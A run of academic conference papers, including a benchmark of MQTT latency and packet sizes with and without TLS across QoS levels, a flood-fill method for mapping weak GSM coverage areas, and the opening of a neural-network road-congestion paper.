In [6], Meena Singh et al. proposed a secure MQTT and MQTT-SN (MQTT for Sensor Networks) using lightweight ECC (elliptic-curve cryptography) [7] based on KP-ABE (key-policy attribute-based encryption) and CP-ABE (ciphertext-policy attribute-based encryption). The authors compared different key sizes for both KP-ABE and CP-ABE; the results show that KP-ABE is less resource-consuming than CP-ABE, which needs devices with higher computing power and storage. In [8], P. Thota et al. analyzed the performance of the MQTT and CoAP protocols in terms of efficiency and requirements on a Raspberry Pi; the results show that CoAP performs better than MQTT as the size of the transferred message increases. In [9], Dan Dinculeană and Xiaochun Cheng conducted a review of existing security solutions for the MQTT protocol; according to the review, the BLAKE2s hash algorithm has the lowest symmetric-key generation time compared with other HMAC (hash-based message authentication code) [10] algorithms such as MD5, SHA3-224/256/384/512, and AES-CBC encryption/decryption. The authors proposed a novel Value-to-HMAC approach that shows better performance; however, the proposed solution provides only confidentiality and integrity, and achieving a higher level of security would require additional techniques that may decrease the algorithm's performance. In [11], M. Martí et al. present a performance study of MQTT-SN and CoAP (Constrained Application Protocol) that evaluates their network traffic and energy consumption in an IoT environment. The experimental tests were carried out on the Contiki operating system [12], a lightweight OS designed for the Internet of Things, characterized by its low power consumption and its support for IoT communication standards; the authors also used Cooja (a network simulator for wireless sensor networks) to test the energy consumption of CoAP and MQTT-SN. The results show that MQTT-SN performs better than CoAP in terms of energy consumption, although it is considered slightly more complicated to implement than CoAP. Despite this interesting simulation, a secure version of these protocols was not addressed, which may reverse the results if implemented with MQTT-SN and CoAP. In [13], A. M. A. Al-Muqarm et al. analyzed the MQTT protocol with and without TLS (Transport Layer Security); the results show that security is improved with TLS, but performance is degraded, since MQTT with TLS consumes more resources and increases both the connection-establishment time and the amount of data. Even if security is improved, MQTT with TLS needs sufficient hardware resources on IoT devices to perform as well as MQTT without security.


3 Background

3.1 MQTT

MQTT stands for Message Queuing Telemetry Transport. It is an open-source messaging protocol that ensures non-permanent communications between devices by transporting their messages. The protocol was first created in 1999 by IBM engineer Andy Stanford-Clark and Eurotech's Arlen Nipper [14], primarily for M2M communication, to enable two devices using different technologies to communicate. Since 2016, MQTT has been an ISO standard. Nowadays MQTT is used to connect millions of devices around the world in all kinds of applications and industries [15]. As an example, Facebook Messenger uses MQTT to deliver push notifications, especially for devices located in zones with poor network coverage [16], and Location-Aware Messaging for Accessibility (LAMA) by IBM is based on MQTT. The MQTT protocol is composed of two basic parts: publishers/subscribers [17], the clients that exchange the messages, and a broker, a server placed between the publisher and the subscriber (Fig. 1).

Fig. 1. MQTT Architecture

3.2 Quality of Service (QoS)

MQTT supports three levels of Quality of Service (QoS) [18] to guarantee the reliability of message transfer:

• QoS 0 (at most once, best effort) sends the message without checking its arrival; in the case of large messages, the message could be lost.
• QoS 1 (at least once) sends the message at least once and checks its arrival at the destination using a PUBACK status check; if this acknowledgment gets lost, the sender resends the message, thinking that the message itself was lost.
• QoS 2 (exactly once) passes the message through exactly once; it uses a four-way handshake, which ensures no loss of the message but increases the delay of connection establishment and of the sending process.
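As an illustration of these levels, the following is a minimal sketch using the Eclipse paho-mqtt client (1.x client API assumed); the broker address and topic are placeholders, and a broker such as Mosquitto is assumed to be reachable on port 1883.

```python
import paho.mqtt.client as mqtt  # assumes the paho-mqtt package (1.x client API)

BROKER = "localhost"   # placeholder broker address (e.g. a local Mosquitto instance)
TOPIC = "test/qos"     # placeholder topic

def on_message(client, userdata, message):
    print(f"received {len(message.payload)} bytes at QoS {message.qos}")

subscriber = mqtt.Client()
subscriber.on_message = on_message
subscriber.connect(BROKER, 1883)
subscriber.subscribe(TOPIC, qos=2)  # granted QoS is the minimum of this and the publish QoS
subscriber.loop_start()

publisher = mqtt.Client()
publisher.connect(BROKER, 1883)
publisher.loop_start()
payload = b"x" * 100
for qos in (0, 1, 2):
    # QoS 0: fire and forget; QoS 1: PUBACK, duplicates possible; QoS 2: four-way handshake
    info = publisher.publish(TOPIC, payload, qos=qos)
    info.wait_for_publish()
publisher.loop_stop()
publisher.disconnect()
```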


4 Experimental Study and Results

In our experimental study, we used Ubuntu as the host system for both the clients (publisher/subscriber) and the broker. The tests were divided into two main parts, analyzing MQTT without security and with SSL; in each part, we ran the tests at the three QoS levels.

4.1 MQTT Analysis Without Security

QoS 0. When sending a message via MQTT using QoS 0, four types of MQTT control packet appear in the MQTT information: CONNECT, CONNACK, PUBLISH, DISCONNECT (Fig. 2).

Fig. 2. Types of MQTT control packet sent with QoS 0

The analysis made with Wireshark captured only three MQTT packets, CONNECT, PUBLISH, and DISCONNECT; since the MQTT protocol is encapsulated in TCP, the acknowledgment (CONNACK) is carried in a TCP frame (Fig. 3).

Fig. 3. Captured MQTT packets using Wireshark on QoS 0

Some recorded frames had a fixed length regardless of the payload sent; the only frame whose length changes is the captured PUBLISH control packet. The PUBLISH frame starts at 76 bytes when a 1-byte payload is sent from the publisher; it then increases by 2 bytes for every 2 bytes added to the payload, and stays fixed when the payload increases by only 1 byte (starting from a 2-byte payload). For example, a 2-byte payload records a 78-byte MQTT PUBLISH length, a 3-byte payload records the same length, and a 4-byte payload records 80 bytes. As a result, we can predict the length of the MQTT PUBLISH frame for a given payload (or the opposite) just by knowing the first two payloads sent and their captured lengths (Fig. 4).
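One possible reading of this reported pattern (76 bytes for a 1-byte payload, then +2 bytes for every 2 bytes of payload) is the closed form below; this is our interpolation of the measurements quoted above, not a value taken from the MQTT specification.

```python
def predicted_publish_frame_len(payload_bytes, base=76):
    # 1 B -> 76, 2 B -> 78, 3 B -> 78, 4 B -> 80, matching the reported captures
    return base + 2 * (payload_bytes // 2)

print([predicted_publish_frame_len(p) for p in (1, 2, 3, 4)])  # [76, 78, 78, 80]
```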


Fig. 4. Received payload according to the payload sent and the delay of transmission on QoS 0

Captured payload = total payload sent when delivering a single packet to the subscriber (since the packet is encapsulated in TCP frames) = payload of the MQTT PUBLISH packet + 376 bytes. We can observe that the delay graph is a strictly increasing function; at a payload of 20 bytes, the delay increases remarkably. QoS 1. When sending a message via MQTT using QoS 1, five types of MQTT control packet appear in the MQTT information: CONNECT, CONNACK, PUBLISH, PUBACK, DISCONNECT (Figs. 5 and 6).

Fig. 5. Types of MQTT control packet sent with QoS 1

Fig. 6. Captured MQTT packets using Wireshark on QoS 1

The same remark applies to the delay graph as in QoS 0: at a certain point the recorded time increases remarkably, here when the payload reaches 25 bytes (5 bytes more than in QoS 0). The difference between QoS 0 and QoS 1 when analyzing the packets in Wireshark is that the PUBLISH packet contains the identifier of the packet sent; in the packet below, the identifier equals 1. We can observe that the starting captured length for a 1-byte payload is 78 bytes in QoS 1, 2 bytes more than in QoS 0 (which starts at 76 bytes). These 2 bytes are due to the identifier added to the PUBLISH control packet (Fig. 7): Captured payload = payload of the MQTT PUBLISH packet + 508 bytes (Figs. 8, 9 and 10).


Fig. 7. Received payload according to the payload sent and the delay of transmission on QoS 1

Fig. 8. Packet structure in QoS 0

Fig. 9. Packet structure in QoS 1

Fig. 10. Identifier coded under 2 bytes in QoS 1

QoS 2. When sending a message via MQTT using QoS 2, seven types of MQTT control packet appear in the MQTT information: CONNECT, CONNACK, PUBLISH, PUBREC, PUBREL, PUBCOMP, DISCONNECT (Figs. 11, 12 and 13).

Fig. 11. Types of MQTT control packet sent with QoS 2


Fig. 12. Captured MQTT packets using Wireshark on QoS 2

The same remark applies here: the captured length starts at 78 bytes (for the PUBLISH control packet), because 2 bytes are added to this packet (Figs. 14 and 15).

Fig. 13. Packet structure in QoS 2

Fig. 14. Identifier coded under 2 bytes in QoS 2

Captured payload = payload of the MQTT PUBLISH packet + 578 bytes.

Fig. 15. Received payload according to the payload sent and the delay of transmission on QoS 2

The delay graph shows an increasing function whose slope changes slightly at a payload of 900 bytes (as we saw in QoS 0 and 1); the difference here is that the point of change is much higher than for the other quality-of-service levels. Comparing MQTT QoS results with no security (Fig. 16):


Fig. 16. Received payload according to the payload sent and the delay of transmission on QoS 0, QoS 1, and QoS 2

In the delay graph, we can see that QoS 0 takes less time than QoS 1 and 2, because the captured payload is smaller than in QoS 1 and 2, but QoS 2 takes less time than QoS 1. In the payload analysis, the higher the QoS, the larger the payload, which is expected because increasing the quality of service means adding control bytes to check the sending and the arrival of the packet. The three graphs are constant until a payload of 100 bytes is sent, after which they become strictly increasing functions.

4.2 MQTT Analysis with Security Implemented

QoS 0 with SSL. As for QoS 0 in the non-secure part, four types of MQTT control packet appear in the MQTT information: CONNECT, CONNACK, PUBLISH, DISCONNECT (Fig. 17).

Fig. 17. Types of MQTT control packet sent with QoS 0 with SSL
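To reproduce a secured client of this kind, a hedged sketch using paho-mqtt (1.x client API assumed) is shown below; the broker address and certificate path are placeholders, and the broker is assumed to expose a TLS listener on port 8883.

```python
import paho.mqtt.client as mqtt  # assumes the paho-mqtt package (1.x client API)

BROKER = "localhost"   # placeholder broker address; the broker must expose a TLS listener
CA_CERT = "ca.crt"     # placeholder CA certificate that signed the broker certificate

client = mqtt.Client()
# Wrap the MQTT/TCP connection in TLS: the MQTT control packets are then carried
# inside TLS records, which is why Wireshark no longer shows them in clear text.
client.tls_set(ca_certs=CA_CERT)
client.connect(BROKER, 8883)   # 8883 is the conventional MQTT-over-TLS port
client.loop_start()
info = client.publish("test/qos", b"x" * 100, qos=0)
info.wait_for_publish()
client.loop_stop()
client.disconnect()
```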

The capture taken with Wireshark does not show the MQTT protocol in clear text, because it is encapsulated in TLS records (Figs. 18 and 19):

Fig. 18. Captured MQTT packets using Wireshark on QoS 0 with SSL


Fig. 19. Received payload according to the payload sent and the delay of transmission on QoS 0 with SSL

Total payload = payload of the MQTT PUBLISH packet + 1088 bytes. QoS 1 with SSL. The same MQTT control packets are sent as for MQTT QoS 1 over non-secure communication (Figs. 20 and 21).

Fig. 20. Types of MQTT control packet sent with QoS 1 with SSL

Fig. 21. Captured MQTT packets using Wireshark on QoS 1 with SSL

The same 2-byte difference between QoS 0 and QoS 1 observed in the non-secure part appears here as well; the difference is that we cannot see the 2 bytes added to the PUBLISH control packet, since the packet itself is protected by the secure layer (Figs. 22, 24, 25 and 26).


Fig. 22. Received payload according to the payload sent and the delay of transmission on QoS 1 with SSL

QoS 2 with SSL. The same packets are sent as in the non-secure part (QoS 2) (Fig. 23).

Fig. 23. Types of MQTT control packet sent with QoS 2 with SSL

Fig. 24. Captured MQTT packets using Wireshark on QoS 2 with SSL

Fig. 25. Received payload according to the payload sent and the delay of transmission on QoS 2 with SSL

Comparing MQTT QoS Results with Security Added.


Fig. 26. Received payload according to the payload sent and the delay of transmission on QoS 0, QoS 1 and QoS 2

In the delay graph, QoS 1 takes less time than QoS 0 and QoS 2; in general QoS 0 and QoS 1 remain very close to each other in terms of delay, whereas QoS 2 is much higher in terms of time. In the payload-analysis graph, the three quality-of-service levels behave the same way, as a constant function that, beyond a certain point, becomes an increasing function: QoS 0 starts at 1292 bytes captured, QoS 1 at 1362 bytes, and QoS 2 at 1462 bytes, with an almost constant gap (~100 bytes) between the three QoS levels at the point where the nature of the function changes.

5 Results and Discussion

For the delay of transmission, we conclude that:

• QoS 0: the secure version is faster than the non-secure one; the non-secure curve is an increasing function, while the secure one is almost constant.
• QoS 1: the secure version is faster than the non-secure one; the two curves are almost constant, with a slightly increasing part.
• QoS 2: the non-secure version is faster than the secure one, because the session is overloaded by the connection establishment with a security layer over it; the two curves are clearly increasing functions.

As we can see in the graph below, the three quality-of-service levels behave the same way, as an increasing function with a point where the rate of increase rises. The higher the QoS, the more the payload increases (Fig. 27).



Fig. 27. Delay comparison of the QoS levels on secure and non-secure MQTT

In both implementations, we can clearly see that there are points (payload sent, payload recorded) at which the curve of each QoS level increases its rate of growth. All QoS levels change at payloads of 100 bytes and 1000 bytes (the second point being 10 times the first) (Fig. 28).

Fig. 28. Payload comparison of the QoS levels on secure and non-secure MQTT

While recording, the flow of packets between server and client changes. We observed that after sending a number of packets, the MQTT PUBLISH control packet returns to


its initial length and starts increasing again; this is due to packet segmentation, which makes sense since segmentation happens when the packet exceeds 1448 bytes.

6 Conclusion

In this paper, we conducted a realistic benchmarking study of the MQTT protocol with and without security enabled at all QoS levels. As a result, MQTT shows how fast it is when it comes to sending a significant payload, and we also revealed many characteristics and differences between the QoS levels in the secure and non-secure parts. It is highly recommended to use MQTT with security to protect the messages exchanged between the clients (publisher/subscriber). In future work, we plan to implement the MQTT protocol with other security algorithms to compare their performance and to get a clear idea of which algorithm best fits the limitations of IoT devices.

References
1. https://transformainsights.com/research/forecast/highlights
2. Bormann, C., Castellani, A.P., Shelby, Z.: CoAP: an application protocol for billions of tiny internet nodes. IEEE Internet Computing 16(2), 62–67 (2012). https://doi.org/10.1109/MIC.2012.29
3. Open standard for messaging and presence. https://xmpp.org/
4. Data Distribution Service Foundation. https://www.dds-foundation.org/what-is-dds-3/
5. Advanced Message Queuing Protocol. https://www.amqp.org
6. Singh, M., Rajan, M.A., Shivraj, V.L., Balamuralidhar, P.: Secure MQTT for Internet of Things (IoT). In: Fifth International Conference on Communication Systems and Network Technologies, pp. 746–751 (2015). https://doi.org/10.1109/CSNT.2015.16
7. Verma, S., Ojha, B.: A discussion on elliptic curve cryptography and its applications. Int. J. Comput. Sci. Issues 9 (2012)
8. Thota, P., Kim, Y.: Implementation and comparison of M2M protocols for Internet of Things. In: 4th International Conference on Applied Computing and Information Technology/3rd International Conference on Computational Science/Intelligence and Applied Informatics/1st International Conference on Big Data, Cloud Computing, Data Science & Engineering (ACIT-CSII-BCD), pp. 43–48 (2016). https://doi.org/10.1109/ACIT-CSII-BCD.2016.021
9. Dinculeană, D., Cheng, X.: Vulnerabilities and limitations of MQTT protocol used between IoT devices. Appl. Sci. 9(5), 848 (2019). https://doi.org/10.3390/app9050848
10. Abad, E.G., Sison, A.M.: Enhanced key generation algorithm of hashing message authentication code. In: Proceedings of the 3rd International Conference on Cryptography, Security and Privacy (ICCSP '19), pp. 44–48. Association for Computing Machinery, New York (2019). https://doi.org/10.1145/3309074.3309098
11. Martí, M., Garcia-Rubio, C., Campo, C.: Performance evaluation of CoAP and MQTT-SN in an IoT environment. Proceedings 31(1), 49 (2019). https://doi.org/10.3390/proceedings2019031049
12. Operating system for resource-constrained devices in the Internet of Things. http://www.contiki-os.org/
13. Alkhafajee, A.R., Al-Muqarm, A.M.A., Alwan, A.H., Mohammed, Z.R.: Security and performance analysis of MQTT protocol with TLS in IoT networks. In: 4th International Iraqi Conference on Engineering Technology and Their Applications (IICETA), pp. 206–211 (2021). https://doi.org/10.1109/IICETA51758.2021.9717495
14. https://www.ibm.com/support/pages/mqtt
15. Montori, F., et al.: LA-MQTT: location-aware publish-subscribe communications for the Internet of Things. ACM Transactions on Internet of Things (2022)
16. https://web.facebook.com/notes/10158791547142200/
17. Kurdi, H., Thayananthan, V.: A multi-tier MQTT architecture with multiple brokers based on fog computing for securing industrial IoT. Appl. Sci. 12(14), 7173 (2022)
18. Lee, S., Kim, H., Hong, D., Ju, H.: Correlation analysis of MQTT loss and delay according to QoS level. In: The International Conference on Information Networking 2013 (ICOIN), pp. 714–717 (2013). https://doi.org/10.1109/ICOIN.2013.6496715


14. https://www.ibm.com/support/pages/mqtt 15. Montori, F., et al.: LA-MQTT: Location-aware publish-subscribe communications for the Internet of Things. ACM Transactions on Internet of Things (2022) 16. https://web.facebook.com/notes/10158791547142200/ 17. Kurdi, H., Thayananthan, V.: A Multi-Tier MQTT architecture with multiple brokers based on fog computing for securing industrial IoT. Appl. Sci. 12(14), 7173 (2022) 18. Lee, S., Kim, H., Hong, D., Ju, H.: Correlation analysis of MQTT loss and delay according to QoS level. In: The International Conference on Information Networking 2013 (ICOIN), 2013, pp. 714–717 (2013). https://doi.org/10.1109/ICOIN.2013.6496715

New Analytical Method to Classify Areas According to Signal Quality and Coverage of GSM Network Ibrahim El Moudden1(B) , Abdellah Chentouf1 , Loubna Cherrat2 , Wajih Rhalem3 , Mohammed Rida Ech-charrat4 , and Mostafa Ezziyyani1 1 Mathematics and Applications Laboratory, Faculty of Sciences and Techniques of Tangier,

Abdelmalek Essaadi University, Tangier, Morocco elmoudden.ibrahi [email protected], {achentouf,mezziyyani}@uae.ac.ma 2 National School of Commerce and Management, Abdelmalek Essaadi University, Tangier, Morocco [email protected] 3 National School of Arts and Crafts of Rabat, Mohammed V University of Rabat, Rabat, Morocco [email protected] 4 National School of Applied Sciences of Tetouan, Abdelmalek Essaadi University, Tangier, Morocco [email protected]

Abstract. In general, the choice of a mobile package offered by operators does not depend solely on the price of services; the network-coverage criterion remains the most relevant parameter influencing the choice of services in relation to the geolocation of customers. Therefore, network coverage testing by operators is essential to better meet the QoS needs of consumers according to their profile. The quality of service (QoS) of GSM networks depends on the availability of an operator's services and on customer satisfaction, which requires quality-of-service assessment operations via field and real-time measurements. For performance reasons related to these measurements, it is necessary to take into account the diversity of user experiences in the most common conditions of use. To this end, we followed an experimental methodology to create an effective measurement system that measures the different communication parameters in order to evaluate and upgrade the QoS. Our methodology consisted first of dividing the study area into several zones, and each zone into several sectors, based on the broadcast stations and the existing weak points. Secondly, we developed a customized mobile application to collect signal-strength data together with the geographical coordinates of the area concerned. For the experimental phase, we automatically deployed our data-collection application in the different areas. After studying and analyzing the collected data using data-mining algorithms, we proposed a new schema of the physical network architecture to improve the QoS according to the consumer profile. Keywords: GSM networks · Cover · Signal strength · Flood Fill algorithm · Zoning



1 Introduction The development of mobile telecommunications networks in recent years requires operators to take increasing account of the reality of the radio-wave propagation medium. The telecommunications market is a competitive market in which the different operators offer mobile packages at various rates. This means that mobile network operators must have information about their own BTS and the BTS locations of their competitors, in order to reduce operating costs through the use of common locations. Mobile network operators constantly face the challenge of adapting their networks to customer behavior. Population coverage by type of mobile network in 2020 is shown in Fig. 1 [1].

Fig. 1. Population coverage by mobile network type in 2020

In most regions, more than 90% of the population has access to a mobile broadband network. Regions such as Africa and the CIS face the greatest gap, where 23% and 11% of the population respectively do not have access to a mobile broadband network. In this context, the deployment of 4G in Africa recorded a growth of 21% in 2020, while growth was negligible in all other regions. About a quarter of the LDC and LSDP population and about 15% of the SIDS population do not have access to a mobile broadband network. While a mobile broadband network covers virtually all of the world’s urban areas, many gaps remain in rural areas. In LDCs, 17% of the rural population has no mobile coverage and 19% of the rural population is covered only by a 2G network (Fig. 2).


Fig. 2. Population coverage by mobile network type and zone type, 2020

Quality of service assurance must be carried out in terms of statistical guarantees valid for relatively short time intervals, of the same order of magnitude as the execution time of the applications. The drive test is a process of measuring and evaluating the coverage, capacity and quality of service (QoS) of a mobile radiotelephone network [2]. The technique involves using a motor vehicle containing a mobile radio-measuring device, which can detect and record a wide variety of physical and virtual parameters of mobile cellular service in a given geographic area. By measuring what a wireless subscriber would experience in a specific area, wireless operators can make changes to their networks that provide better coverage and service to their customers. These tests require a mobile vehicle equipped with drive test devices, which are generally highly specialized electronic devices that interface with mobile phones. This ensures that the measurements are realistic and comparable to the actual user experience. In this context, it first becomes imperative to have a very accurate system for measuring QoS in telecommunications networks. Before signing up for a mobile plan, it is essential to find the offer that best fits one’s profile. In recent years the telecommunications industry has experienced an increase in the types of wireless services, and there is a great deal of competition between the various large companies in this field. Although urban areas have coverage in the 3G


and 4G wireless networks, there are areas that sometimes have a total lack of coverage. In the middle of this imbalance, a certain class of customers suffers from the absence of any coverage, while the rest of the customers benefit fully from the service. As a result, many customer complaints are addressed to the company concerned asking for a solution to this problem. It is not possible to collect data exhaustively or to achieve total coverage in order to examine the signal level at each position. Therefore, the precise delimitation of low-signal areas on the map remains a very important topic, as these areas are adjacent to areas with good coverage.

2 Related Work
2.1 Evaluation of the Signal Strength of the Mobile Network for GSM Networks in Gusau, Zamfara State
Network subscribers complained about the poor quality of service (QoS) provided by GSM operators in the study area [3]. That work measures the signal strength of the GSM networks of three service providers (X, Y and Z) at the Federal University of Gusau, in the central part of Zamfara State, in order to respond to user complaints. The data used for this evaluation were collected from the University’s National Space Research and Development Agency (NASRDA) office over a period of thirty (30) days. The signal strength of these network providers is recorded every five (5) minutes of each day, giving 288 records per day and 8640 records for the thirty days. The institute uses a field strength (FS) meter to generate this data as well as data on other physical conditions.
2.2 Comparison Between the Different Operators
Operator X has 13% high signals, 77% medium signals, 3% weak signals, and 7% wrong signals (Fig. 3).

Fig. 3. Graphical illustration of the signal strength of operator X in percentages.


Fig. 4. Graphical illustration of the signal strength of the Y operator in percentages.

Figure 4 shows that operator Y has 90% medium signals, 3% weak signals and 7% wrong signals. Figure 5 shows that operator Z has 77% high signals, 13% medium signals and 10% weak signals. The results indicate that operator Z has the best signal strength, followed by operator Y and then operator X.

Fig. 5. Graphical illustration of the signal strength of operator Z in percentages.

3 Collection of Data via the Application
3.1 Development of a Mobile Application
Since received signal strength indication (RSSI) information is available in all mobile phones, we developed a custom mobile application to collect signal strength data (RSSI) together with the user’s geographical coordinates. We installed this app on several mobile phones carried in a car (Fig. 6).
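As an illustration of the kind of record the application stores, the following Python sketch (our own assumption, not the actual application code; the field names, the CSV layout and the sample values are hypothetical) logs one RSSI measurement together with its GPS coordinates:

import csv
from dataclasses import dataclass

@dataclass
class Sample:
    # One measurement collected by the mobile application
    timestamp: str    # e.g. "08:13:20"
    latitude: float
    longitude: float
    rssi_dbm: int     # received signal strength indication, in dBm

def save_samples(samples, path="measurements.csv"):
    # Append the collected samples to a CSV file for later analysis
    with open(path, "a", newline="") as f:
        writer = csv.writer(f)
        for s in samples:
            writer.writerow([s.timestamp, s.latitude, s.longitude, s.rssi_dbm])

# Hypothetical record: the coordinates and the RSSI value are illustrative only
save_samples([Sample("08:13:20", 35.7628, -5.8386, -87)])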


Fig. 6. User Interface

3.2 The Areas Concerned
The data was collected in two different geographical areas: the first is a densely populated area and the second a sparsely populated area. We drove through the streets of each area to collect as much data as possible (Fig. 7).


A. Densely Populated Area

Fig. 7. Area with higher population density

The following figure shows a sample of real-time signal strength and location data in the densely populated area:


Fig. 8. Signal strength of the most densely populated area


B. Sparsely Populated Area

Fig. 9. Sparsely Populated Area

The following figure shows a sample of real-time signal strength and location data in the sparsely populated area (Fig. 10):


Fig. 10. Signal strength of the sparsely populated area

4 The Proposed Algorithm
4.1 The Flood Fill Algorithm
In this article, we propose a flood fill algorithm. The algorithm starts from a given point (x, y) and reassigns all the pixel values currently set to a given interior color with the required fill color. In the case of multiple interior colors, pixel values are reassigned so that all interior points contain the same color. The traditional flood fill algorithm takes three parameters: a starting pixel, a target color and a replacement color. The algorithm searches for all pixels


of the array that are connected to the starting pixel by a path of the target color and replaces them with the replacement color. Two methods can be used to create a continuous boundary by connecting pixels: the 4-connected and the 8-connected approaches. In the 4-connected method [4], a pixel can have at most four neighbors; the neighbors of position (x, y) are Right (x+1, y), Left (x-1, y), Up (x, y+1) and Down (x, y-1), as shown in Fig. 11.

Fig. 11. 4-connected method

In contrast, in the 8-connected method a pixel can have up to eight neighbors; the positions adjacent to (x, y) are Right (x+1, y), Left (x-1, y), Up (x, y+1), Down (x, y-1), Upper-Right (x+1, y+1), Upper-Left (x-1, y+1), Lower-Left (x-1, y-1) and Lower-Right (x+1, y-1), as shown in Fig. 12.

Fig. 12. 8-connected method


4.2 Program Code
The 4-connected variant can be written as the following recursive procedure:
Step 1: Initialize old_color and fill_color.
Step 2: Read the current_value at position (x, y).
Step 3: If current_value equals old_color then
          setpixel(x, y) with fill_color
          Flood_fill_4_connected(x, y+1, old_color, fill_color)
          Flood_fill_4_connected(x+1, y, old_color, fill_color)
          Flood_fill_4_connected(x, y-1, old_color, fill_color)
          Flood_fill_4_connected(x-1, y, old_color, fill_color)
        end if
Step 4: End
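A runnable sketch of the procedure above is given below in Python (an iterative version is used to avoid deep recursion; the grid layout and the color labels are illustrative assumptions of ours):

def flood_fill(grid, x, y, old_color, fill_color, connectivity=4):
    # Iterative flood fill over a 2D grid of color values.
    # Starting from (x, y), every cell reachable through neighbors holding
    # old_color is recolored with fill_color. connectivity selects the
    # 4-connected or 8-connected neighborhood described above.
    if grid[y][x] != old_color or old_color == fill_color:
        return grid
    if connectivity == 4:
        offsets = [(1, 0), (-1, 0), (0, 1), (0, -1)]
    else:  # 8-connected
        offsets = [(dx, dy) for dx in (-1, 0, 1) for dy in (-1, 0, 1)
                   if (dx, dy) != (0, 0)]
    stack = [(x, y)]
    while stack:
        cx, cy = stack.pop()
        if 0 <= cy < len(grid) and 0 <= cx < len(grid[0]) and grid[cy][cx] == old_color:
            grid[cy][cx] = fill_color
            stack.extend((cx + dx, cy + dy) for dx, dy in offsets)
    return grid

# Usage: recolor the connected region of "weak" cells containing (0, 0);
# the isolated "weak" cell at the bottom right is left untouched.
area = [["weak", "weak", "good"],
        ["weak", "good", "good"],
        ["good", "good", "weak"]]
flood_fill(area, 0, 0, "weak", "problem")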

5 Proposed Solution
5.1 Nodes Represented by Signal Strength Level in the Relevant Areas
We identified the nodes where the signal was interrupted (weak signal) in order to delimit problem areas on the network; adjacent areas are identified using the flood fill algorithm. The identification of geographical areas begins with the collection of real-time signal strength data and the classification of nodes. The following table defines, depending on the signal strength level, the color assigned to each node:


Node Category     Signal strength      Node color
Wrong signals     -101 to -120 dBm     Red
Weak signals      -91 to -100 dBm      Red
Medium signals    -76 to -90 dBm       Blue
High signals      -50 to -75 dBm       Green

Fig. 13. Signal strength classes
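As a small illustration, the thresholds of Fig. 13 can be turned into a classification function; this is a sketch of ours, not code from the paper, and it simply assumes that any value stronger than -50 dBm is also classified as high:

def classify_node(rssi_dbm):
    # Map a measured RSSI value (in dBm) to the node category and color
    # defined in Fig. 13.
    if rssi_dbm >= -75:            # -50 to -75 dBm
        return "High signal", "Green"
    if rssi_dbm >= -90:            # -76 to -90 dBm
        return "Medium signal", "Blue"
    if rssi_dbm >= -100:           # -91 to -100 dBm
        return "Weak signal", "Red"
    return "Wrong signal", "Red"   # -101 dBm and below

print(classify_node(-87))          # ('Medium signal', 'Blue')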

5.2 Delimiting Problem Areas via the Flood Algorithm
The flood algorithm is applicable when the pixel data form a matrix in which every pixel has neighbors, that is to say, when coverage is complete. In our study, the form of the data does not allow total coverage to be reached, because data collection follows linear paths. In a first solution, we keep the linear paths we have, that is, we determine the signal level of the roads: we apply the flood algorithm along our path instead of using the four- or eight-connected flood algorithm, which means we use the available roads based on our route and intersection points. In a second solution, we generate a valid environment in which to apply the four- or eight-connected flood algorithm; to do so, we forecast the signal level around each node so as to cover the entire surface. Point-to-area forecasts based on this method consist of series of numerous point-to-point forecasts. The number of pixels should be large enough to ensure that the received signal strength values obtained are reasonable estimates of the median values for the elementary locations they represent. The signal coverage can be determined from the different straight lines containing the actual received signal strength values measured in real time. For each line (a*x1 + b, a*x2 + b, a*x3 + b, ..., up to a*xn + b) we draw triangular regions whose vertices are nodes with geographical coordinates (x1, y1), (x2, y2), (x3, y3), ..., (xn, yn) along the respective lines. The coverage of each triangle takes into account the signal level of the neighboring nodes as an indicator of propagation.
5.3 Model Architecture
Figures 11, 12 and 13.
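To illustrate the first solution of Sect. 5.2 (keeping the linear drive paths), the sketch below groups consecutive weak-signal samples collected along a route into problem segments. The sample format and the -90 dBm threshold are our own assumptions, taken from the classification of Fig. 13, not part of the original method:

def problem_segments(samples, weak_threshold=-90):
    # samples: list of (latitude, longitude, rssi_dbm) tuples ordered along
    # the drive path. Consecutive samples below the threshold are grouped
    # into one problem segment; a segment is closed as soon as a sample at
    # or above the threshold is met.
    segments, current = [], []
    for lat, lon, rssi in samples:
        if rssi < weak_threshold:
            current.append((lat, lon))
        elif current:
            segments.append(current)
            current = []
    if current:
        segments.append(current)
    return segments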


6 Analysis of the Signal According to the Environment of Each Zone
Along the propagation path of the cell signal there are natural or artificial barriers: rugged terrain, thick woods, buildings and vehicles that block the passage of electromagnetic waves. By reflecting off obstacles, the signal loses energy and weakens; for this reason the connection is degraded or lost. For these reasons, we surveyed the areas of concern manually and gathered as much information as possible about the types of obstacles.

7 Conclusion
Addressing network coverage problems is clearly a complex matter that requires the study of signal strength data. However, it is not possible to collect data covering the entire studied area, and most previous research only determines the signal strength without delimiting the problem areas. In this context, we discussed the division of the network into regions according to the signal strength level using the flood fill algorithm.

References
1. Facts and Figures 2020. https://www.unapcict.org/sites/default/files/2021-03/FactsFigures2020.pdf. Accessed 7 Mar 2022
2. Le Drive Test. Scribd. https://fr.scribd.com/document/215126010/Le-Drive-Test. Accessed 15 Mar 2022
3. Sa’adu: Assessment of Mobile Network Signal Strength for GSM Networks in Gusau, Zamfara State (2019). https://www.semanticscholar.org/paper/Assessment-of-Mobile-NetworkSignal-Strength-For-In-Sa%E2%80%99adu/a9c6efbb62396bd08b5e7fafcb966dd06f50236e. Accessed 16 Mar 2022
4. Bhawnesh, J., Kalra, E.T., Tomer, V.: Comparison and Performance Evaluation of. International Journal of Innovative Technology and Exploring Engineering, vol. 8, August 2020. https://doi.org/10.35940/ijitee.L1002.10812S319

Neural Network Feature-Based System for Real-Time Road Condition Prediction Youssef Benmessaoud1(B) , Loubna Cherrat2 , Mohamed Rida Ech-charrat1 , and Mostafa Ezziyyani1 1 Faculty of Sciences and Technologies of Tangier, Tangier, Morocco

{ybenmessaoud,m.ezziyyani}@uae.ac.ma

2 Abdelmalek Essaadi University, ENCG, Tangier, Morocco

[email protected]

Abstract. Road congestion has become a very popular and very challenging subject, and many solutions have been proposed to address this phenomenon. Short-term forecasting, that is, the estimation of traffic flow conditions from the current day to the next few days, is a crucial component of cutting-edge driver assistance systems and can be seen as a real solution to the congestion problem. In this paper we propose a real-time prediction system based on different road features determined after studying various road networks over different periods of the year and different times of the day. The main goal of the current study is to construct a data-driven, feature-based model to achieve accurate and near real-time prediction of the road condition at the user’s destination. Keywords: Intelligent decision · Information Technology · congestion prediction · neural networks · traffic flow prediction · Advanced traffic management systems

1 Introduction
